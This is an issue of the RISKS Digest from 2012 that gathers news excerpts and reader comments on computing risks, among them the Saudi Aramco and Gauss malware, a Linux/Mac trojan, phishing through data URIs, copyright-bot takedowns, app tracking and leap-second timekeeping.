Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
Excerpt from 2 more Yosemite visitors have hantavirus http://www.usatoday.com/news/health/story/2012-08-30/yosemite-hantavirus-warnings/57435330/1 Meanwhile, the park sent warning e-mails and letters on Wednesday to another 1,000 people who stayed in tent cabins in Curry Village, after officials found that a computer glitch had stopped the notices from going out with the original 1,700 warnings on Monday. The warning says anyone with flu-like symptoms or respiratory problems should seek immediate medical attention.
A $2.4-billion replacement for the U.S. air-traffic control computers plagued by delays and cost overruns will be completed within the revised budget and 2014 deadline, said Michael Huerta, acting chief of the FAA. [ERAM - En-Route Automation Modernization] [Bloomberg, PGN-ed] (well maybe!!! djf) [Browse on the Subject line for the article. Dave's comment might relate to the fact that some of our readers may remember the eventual cancelation of an earlier en-route ATC modernization effort, after the expenditure of $4 billion. It's nice to know costs are coming down! PGN]
Bloomberg, 28 Aug 2012 http://www.bloomberg.com/news/2012-08-28/united-check-ins-slowed-as-airline-reservation-system-goes-down.html
First hacktivist-style assault to use malware? John Leyden, *The Register*, 29 August 2012 Analysis Saudi Aramco said that it had put its network back online on Saturday, 10 days after a malware attack floored 30,000 workstations at the oil giant. In a statement [1], Saudi Arabia's national oil firm said that it had "restored all its main internal network services" hit by a malware outbreak that struck on 15 August. The firm said its core business of oil production and exploration was not affected by the attack, which resulted in a decision to suspend Saudi Aramco's website for a period of a few days, presumably as a precaution. Corporate remote access services were also suspended as a result of the attack. Oil and production systems were run off "isolated network systems unaffected by the attack, which the firm has pledged to investigate. In the meantime, Saudi Aramco promised [2] to improve the security of its network to guard against fresh assaults. ... http://www.theregister.co.uk/2012/08/29/saudi_aramco_malware_attack_analysis/
Scott Bauer, Thousands fall victim to utility payment scam, Associated Press, 12 Jul 2012 As much as President Barack Obama wants your vote, he's not actually offering to pay your monthly bills. But thousands of Americans have been persuaded otherwise, falling victim to a fast-moving scam that claims to be part of an Obama administration program to help pay utility bills in the midst of a scorching summer. The scheme spread quickly across the nation in recent weeks with help from victims who unwittingly shared it on social media sites before realizing they had been conned out of personal information such as Social Security, credit card and checking account numbers. ... http://www.boston.com/business/news/2012/07/12/thousands-fall-victim-utility-payment-scam/CM2m794xalBFJq043Kei5O/story.html
Appeal for help to break open hidden scrambled payload John Leyden, *The Register*, 14 August 2012 Antivirus experts have called on cryptographers and other clever bods for help after admitting they are no closer to figuring out the main purpose of the newly discovered Gauss supervirus. While it's known that the complex malware features many information-stealing capabilities, with a specific focus on capturing website passwords, online banking account credentials and system configuration data from infected machines, the content of the virus's encrypted payload is still a mystery. Kaspersky Lab had tracked Gauss for weeks before announcing its discovery last week. Antivirus experts at the security biz and elsewhere have been burning the midnight oil in the days since, and although progress has been made - for example in analysing its architecture [1], unique modules and communication methods - the payload encryption is unbroken. Researchers reckon the hidden binary blob, when decrypted and executed, looks for a program specifically named using an extended character set, such as Arabic or Hebrew. What that program might be remains unclear as long as the encryption remains unbroken. The general concuss among security experts is that Gauss - like Flame, Duqu and Stuxnet before it - is a nation-state sponsored cyber-espionage toolkit, quite possibly built from the same components as Flame. ... http://www.theregister.co.uk/2012/08/14/gauss_mystery_payload/ [One of my colleagues suggests that unraveling the hidden payload would require breaking some serious crypto, and that someone successfully doing so might not be in a position to want to claim success. But RISKS awaits any further news on this topic. PGN]
[An early mention of this case stated: “Harvard University is investigating what it calls an `unprecedented' case of cheating. College officials say around 125 students may have shared answers and plagiarized on a [Introduction To Congress] final exam.'' Source: Curt Nickisch, NPR 31 Aug.] The exam in question was an open-book take-home exam from a professor reportedly inclined to give mostly high grades based in part on factors such as the number of citations! Perhaps many of the 125 students were citing the same sources from the Internet? Is that collusion or collation collision? We await details. PGN] Richard Perez-Pena, *The New York Times*, 31 Aug 2012 Harvard students suspected in a major cheating scandal said that many of the accusations are based on innocent - or at least tolerated - collaboration among students, and with help from graduate-student teachers who sometimes gave them answers to test questions. Students said they were tripped up by a course whose tests were confusing, whose grading was inconsistent, and for which the professor and teaching assistants gave contradictory signals about what was expected. They face the possibility of a one-year suspension from Harvard or revocation of their diplomas if they have already graduated, and some said that they will sue the university if any serious punishment is meted out. In years past, the course, Introduction to Congress, had a reputation as one of the easiest at Harvard College. Some of the 279 students who took it in the spring semester said that the teacher, Matthew B. Platt, an assistant professor of government, told them at the outset that he gave high grades and that neither attending his lectures nor the discussion sessions with graduate teaching fellows was mandatory. ... http://www.nytimes.com/2012/09/01/education/students-of-harvard-cheating-scandal-say-group-work-was-accepted.html
Simon Phipps and Ted Samson, Robots aren't smart enough to decide if video or song is used lawfully; instead of trying to improve content monitoring software, we should look to ditch it, *InfoWorld*, 5 Sep 2012 http://www.infoworld.com/t/drm/automated-drm-keeps-spoiling-the-show-the-dnc-mars-201688 opening text (one of the examples): Science-fiction fans from all over the world were avidly watching the live broadcast of the Hugo Awards last Sunday from Chicon 7, the World Science Fiction Convention in Chicago. This is a venerable event with much more longevity than you might imagine: Attendees were celebrating the event's 70th year. One of the award winners, British author Neil Gaiman, was recognized for a script for the cult BBC TV series "Doctor Who." Following the showing of a clip from the episode, Gaiman took the podium for the award ceremony to make his acceptance speech. Then, however, the broadcast was abruptly cut off. A robot at Ustream, presumably using data provided by the BBC, decided on the basis of that short clip that this was an illegal broadcast of "Doctor Who" and pulled the plug. Worse, it turned out that no one at the Hugo Awards or at Ustream was empowered to turn it back on again. Ustream has promised to upgrade its robot to understand fair use, but the proposal is both ridiculous—even judges struggle with fair use arguments—and dangerous.
"This occurred because our 3rd party automated infringement system, Vobile, detected content in the stream that it deemed to be copyrighted. Vobile is a system that rights holders upload their content for review on many video sites around the web. The video clips shown prior to Neil's speech automatically triggered the 3rd party system at the behest of the copyright holder." http://j.mp/RhrLMq (Ustream via NNSquad) Most of the folks commenting on their posting are not very happy. [In another NNS posting on this subject, Lauren Weinstein added, “A similar risk exists with Google's "Hangouts On Air" via Content ID. Solutions are not trivial.'' PGN] [Lee Rudolph noted Hugo and the Rampaging Robots. PGN] http://io9.com/5940036/how-copyright-enforcement-robots-killed-the-hugo-awards
http://j.mp/OQe20R (This message on Google+) http://j.mp/OQexrV (Slate, via NNSquad) "Either way, this amounts to something less than a copyright apocalypse. Michelle Obama's speech is still available on plenty of other YouTube channels, including here, here, and here. But on the heels of the Hugo Awards debacle, it's another reminder of the need for human vigilance against overzealous digital-rights-management algorithms. In a statement chalking up the glitch to "a technical error on YouTube," an Obama campaign official added, "We do not expect tonight's coverage will be affected." Copyright bots, the gauntlet has been thrown!" Irrespective of this particular case, this whole area (not just YouTube) of automated content flagging needs serious attention from a number of standpoints. Here's an example of what has happened to me (and many other people). I uploaded a video of mine that included a segment of old, definitely public domain material. Shortly thereafter, my entire vid was flagged by YouTube's Content ID. Why? It took some digging to figure out, but it turns out a Content ID partner had uploaded a video of their own that happened to include a section of the same public domain material I had used. This apparently made it look like my video was infringing, since Content ID assumed the section of my vid that matched their vid was in violation. Wrong! But Content ID partners get the assumption of being correct, and there's no way for an average user to assert that something is public domain a priori. I was able to get this reversed by careful explanation on the appropriate forms, but I wonder how many people would just throw up their arms and say, "To hell with it!" and not bother? This is not an easy situation to solve, but the explicit assumption that Content ID partners are correct and that takedowns or other actions are immediate—with a protest required to get blocks, etc. removed after the fact, strikes me as increasingly problematic. Lauren Weinstein (lauren@vortex.com): http://www.vortex.com/lauren Network Neutrality Squad: http://www.nnsquad.org +1 (818) 225-2800
"One million unique device identifiers (UDIDs) from iOS devices have been posted online by hacking group AntiSec, who claimed the UDIDs came from an FBI-owned laptop. The group published a file containing the UDIDs-as well as push notification tokens, device names, and more-on Monday evening, promising that there are plenty more entries where that came from. AntiSec claims the original file contained roughly 12 million UDID entries-some with very personal data attached, such as full names, cell numbers, and home addresses." http://j.mp/Rhq4yu (ars technica via NNSquad) [Key word right now is *alleged*. LW]
"The Federal Bureau of Investigation is refuting a statement made by members of AntiSec this weekend that they hacked the laptop of an FBI special agent and stole a file containing 12 million Apple device IDs and associated personal information." http://j.mp/PZtzNY (*Wired* via NNSquad)
Wrapping everything up in the same box makes hard tasks easy and big problems bigger, *InfoWorld*, 4 Sep 2012 http://www.infoworld.com/d/data-center/when-virtualization-becomes-your-worst-enemy-201398 [The IT version of putting all of one's eggs in one basket?]
Randall Stross, *The New York Times*, 1 Sep 2012 [PGN-ed] http://www.nytimes.com/2012/09/02/technology/gps-and-human-error-can-lead-drivers-astray-digital-domain.html?nl=todaysheadlines&emc=tha26_20120902 The turn-by-turn instructions of GPS-based navigation systems, ingeniously designed though they may be, can't always save us from ourselves. Consider the experience of a man from San Diego who flew to the East Coast and picked up a GPS-equipped rental car at the airport. After 20 minutes, he sensed he was headed in the wrong direction. Then he realized that he had unthinkingly entered his California address as his destination. "The navigation system had dutifully set a route back to his home in San Diego, 3,000 miles away," said Barry Brown, co-director of the Mobile Life Center, based in Stockholm, which does research on mobile communication. The incident happened to a friend of his. Mr. Brown is co-author of a recent paper titled "The Normal Natural Troubles of Driving With GPS." The paper illuminates a drawback of GPS technology: that it is designed for docile drivers whose navigational skills have atrophied. ... Randall Stross <stross@nytimes.com> is an author based in Silicon Valley and a professor of business at San Jose State University.
John Leyden, Windows? Who the hell uses that? *The Register*, 29 August 2012 Security researchers have discovered a potential dangerous Linux and Mac OS X cross-platform trojan. Once installed on a compromised machine, Wirenet-1 opens a backdoor to a remote command server, and logs key presses to capture passwords and sensitive information typed by victims. The program also grabs passwords submitted to Opera, Firefox, Chrome and Chromium web browsers, and credentials stored by applications including e-mail client Thunderbird, web suite SeaMonkey, and chat app Pidgin. The malware then attempts to upload the gathered data to a server hosted in the Netherlands. ... http://www.theregister.co.uk/2012/08/29/linux_mac_trojan/
"Among a bevy of patents awarded to Apple this week was one that would enable or disable certain features of a phone depending on its location. It could be useful, but it also raises serious questions about who really owns your device." http://j.mp/PZNegI (NBC via NNSquad) A lot of ideas are patented but never used. Anyway, without reading the patent in detail, I'd note there are a variety of apps (that probably postdate the patent application) that do this already. One problem with any attempt to enforce such a regime is that you need everyone to have phones carrying the capability, and you have to be ready for the litigation exposure if (for example) an important call or message is blocked by such a system. It doesn't take much imagination to think of a bunch of other exposure examples as well.
http://www.boston.com/business/technology/2012/09/02/smartphone-apps-track-users-even-when-shut-down/IH5UM0d4FYU5Gf5GlFjWcL/story.html Some smartphone apps collect and transmit sensitive information stored on a phone, including location, contacts, and Web browsing histories, even when the apps are not being used by the phone's owner, according to two researchers at the Massachusetts Institute of Technology. "It seems like people are no longer in control of their own privacy," said Frances Zhang, a master's degree student in computer science at MIT. Zhang and fellow researcher Fuming Shih, a computer science doctoral candidate, found that some popular apps for phones running Google Inc.'s Android operating system are continually collecting information without informing the phone's owner. The popular game Angry Birds uses the phone's GPS and Wi-Fi wireless networking features to track the owner's location, even when he's not playing the game, for example. Another game, Bowman, collects information from the phone's Internet browser, including what websites the owner has been visiting. And WhatsApp, a popular text-messaging program, scans the user's address book when it is seemingly idle.
Paul Marks, *New Scientist*, 4 Sep 2012, via Dave Farber's IP http://www.newscientist.com/blogs/onepercent/2012/09/honeytrap-catches-copyright-co.html Anyone who has downloaded pirated music, video or ebooks using a BitTorrent client has probably had their IP address logged by copyright-enforcement authorities within 3 hours of doing so. So say computer scientists who placed a fake pirate server online - and very quickly found monitoring systems checking out who was taking what from the servers. The news comes from this week's SecureComm conference in Padua, Italy, where computer security researcher Tom Chothia and his colleagues at the University of Birmingham, UK, revealed they have discovered "massive monitoring" of BitTorrent download sites, such as the PirateBay, has been taking place for at least three years. BitTorrent is a data distribution protocol that splits an uploaded digital media file into many parts and shares it around a swarm of co-operating servers. Birmingham's fake server acted like a part of a file-sharing swarm and the connections made to it quickly revealed the presence of file-sharing monitors run by "copyright enforcement organisations, security companies and even government research labs". ...
John Leyden, Watch out for the tinyurl that isn't, *The Register*, 3 Sep 2012 A shortcoming in browsers including Firefox and Opera allows crooks to easily hide an entire malicious web page in a clickable link - ideal for fooling victims into handing over passwords and other sensitive info. Usually, so-called "phishing attacks" rely on tricking marks into visiting websites designed by criminals to masquerade as banks and online stores, thus snaffling punters' credentials and bank account details when they try to use the bogus pages. However this requires finding somewhere to host the counterfeit sites, which are often quickly taken down by hosting companies and the authorities or blocked by filters. Instead, the malicious web pages can be stored in data URIs - uniform resource identifiers, not to be confused with URLs - which stuff the web code into a handy string that when clicked on, instructs the browser to unpack the payload and present it as a page. It negates the need to find somewhere to secrete your malicious page, and once shortened using a service such as TinyURL, the URI can be reduced to a small URL perfect for passing around social networks, online chats and e-mail. Crooks would still need to set up a server to receive data from victims, however. ... http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/
"This crossed my desk this morning, it is a long and detailed (and honest!) account by an insider of Google's efforts to increase code quality and product quality: http://mike-bland.com/2012/07/10/test-mercenaries.html " [This item is indeed long, but could be worth reading if you consider yourself a software engineer. PGN]
An MSN editorial had some insight: "...Is that my cell phone buzzing, or the seat? 2013 Cadillac XTS (c) GMCadillac has a good idea here. Instead of annoying the driver with flashing lights and buzzing sounds from various active safety systems, it sends all those warnings to his back and rear end. ... The touch-capacitive dash is another story. See those silver trim pieces that look like you should touch them? Don't. They're just finger guides. The actual sensors are above them, which is confusing and frustrating. They're also slow to respond to repeated inputs, like adjusting the cooled seat or the fan speed, unless you're deliberate with your pace and timing. Who wants to think about how you touch a control, especially while driving? Lincoln already came out with this system and it's no different. It's like tapping a plastic post and wondering if some magic will happen. You also feel kind of dumb getting it wrong, which tends to happen when you're paying attention to the road. This feature needs to die." http://editorial.autos.msn.com/blogs/autosblogpost.aspx?post=e29f4907-f964-45f5-818a-69a45340e1e4 Personally, I'm amazed that any UI designer for car controls would even think of making hand-eye coordination necessary for ancillary controls. I can control my old New Beetle radio and HVAC by touch, with very little learning. But my other cars with touch screens, any little bump and the wrong command gets invoked. And the voice control? I could go on and on, but in a nutshell, not there yet, adds frustration.
> And the people who don't like leap seconds or find them hard to deal > with can switch to TAI, which already exists. Need a cheap local > source of TAI? Get a GPS. And start setting up an NTP network of TAI > timeservers—anyone doing this yet? People are doing this. Several manufacturers of NTP servers allow an option where it can *violate the NTP spec* and provide GPS time or TAI instead of UTC. Alternatively, the IEEE 1588 spec for PTP is all about this notion of an operational system time scale based on TAI. Alas, many international agencies responsible for this subject do not have scope of purview to make pronouncements on this subject, and the proceedings of various meetings do not show consensus. During the past decade the pronouncements from the providers of TAI at BIPM have done an about face. In 1999 the CCTF wrote saying yes, use TAI instead of UTC: The CCTF recommends, therefore, that in conformity with this ITU Recommendation developers of future satellite navigation systems and electronic communication systems should link their time scales to TAI as the only alternative to UTC and that, insofar as it is feasible, existing systems take steps to align their time scales with TAI. http://ursiweb.intec.ugent.be/A_97-99.htm But in 2007 the CCTF wrote quite the opposite, saying no, do not use TAI instead of UTC: TAI is the uniform time scale underlying UTC, and that it should not be considered as an alternative time reference. http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf TAI also does not serve POSIX, which specifies that the time_t is based on a trivial relationship to the face-value of UTC and that all days must have 86400 seconds. Unfortunately for POSIX the entire point of the UTC used in radio broadcast time signals since 1972 is that the second is not related to the day. From a system engineering standpoint it makes sense to use TAI, but its providers do not clearly agree. Furthermore, it is not possible to use TAI in an operational system because its value is not available until the next month. Using GPS system time is an available good choice from an engineering standpoint, but GPS does not have international standard status required by some contractual specifications. The previous meeting on the future of UTC re-visited many of these subjects. The final paper at that meeting gave a worked example of using leap-free uniform atomic time (GPS or TAI) for POSIX while still retaining the notion of UTC day defined by earth rotation. Slides and preprints of the 400 pages proceedings are available at http://www.cacr.caltech.edu/futureofutc/2011/index.cfm Steve Allen, UCO/Lick Observatory--ISB, 1156 High Street, Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ +1 831 459 3046 <sla@ucolick.org>
Please report problems with the web pages to the maintainer